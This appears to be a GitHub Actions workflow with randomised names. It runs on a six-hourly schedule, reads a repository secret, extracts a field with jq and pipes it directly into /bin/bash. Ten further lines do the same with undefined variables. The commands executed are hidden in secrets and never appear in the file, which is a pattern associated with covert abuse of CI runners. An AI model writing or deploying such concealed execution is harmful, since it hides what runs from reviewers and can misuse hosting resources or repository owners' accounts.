name: xianghuaguo3451
on:
  workflow_dispatch:
  schedule:
    - cron: '49 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xianghuaguo3451
        env:
          fnunz2: ${{ secrets.fnunz2 }}
        run: |
          echo $fnunz2 | jq -r .gye2 | /bin/bash
          echo $vrigl307 | jq -r .j78 | /bin/bash
          echo $v9 | jq -r .txj7609 | /bin/bash
          echo $spay96662 | jq -r .c5631 | /bin/bash
          echo $mg624 | jq -r .jf8958 | /bin/bash
          echo $j95 | jq -r .knlfx2 | /bin/bash
          echo $pqxp6 | jq -r .vztku31809 | /bin/bash
          echo $mkadu16237 | jq -r .hbjzp08 | /bin/bash
          echo $p25715 | jq -r .dlecb89863 | /bin/bash
          echo $art3017 | jq -r .wae4 | /bin/bash
          echo $yqyi4 | jq -r .wko6796 | /bin/bash

